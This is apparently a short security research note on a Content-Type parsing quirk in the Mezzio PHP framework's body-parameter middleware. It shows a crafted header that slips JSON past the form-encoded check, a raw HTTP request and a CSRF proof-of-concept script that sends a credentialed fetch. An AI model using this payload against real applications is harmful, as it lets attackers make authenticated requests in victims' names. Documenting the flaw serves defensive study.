Endpoint
$app->pipe(BodyParamsMiddleware::class);
...
public function indexAction() {
$request = $this->getRequest();Source code
By default, BodyParamsMiddleware composes the following strategies:
- Mezzio\Helper\BodyParams\FormUrlEncodedStrategy
- Mezzio\Helper\BodyParams\JsonStrategy
/mezzio/mezzio-helpers/src/BodyParams/FormUrlEncodedStrategy.php
class FormUrlEncodedStrategy implements StrategyInterface
{
public function match(string $contentType) : bool
{
return 1 === preg_match('#^application/x-www-form-urlencoded($|[ ;])#', $contentType);/mezzio/mezzio-helpers/src/BodyParams/JsonStrategy.php
class JsonStrategy implements StrategyInterface
{
public function match(string $contentType) : bool
{
return 1 === preg_match('#^application/(|[\S]+\+)json($|[ ;])#', $contentType);JSON Content-Type
application/XXX;+json
HTTP Request
A different case is needed in order to bypass the FormUrlEncodedStrategy.
POST /json HTTP/1.1
Host: localhost
Content-Type: application/x-WWW-Form-urlencoded;+json
Content-Length: 13
{"test":true}CSRF PoC
<script>
fetch('http://localhost/json',{
method:'POST',
headers:{'Content-Type':'application/x-WWW-Form-urlencoded;+json'},
body:'{"test":true}',
credentials: 'include'
})
</script>Multipart Content-Type
Same as PHP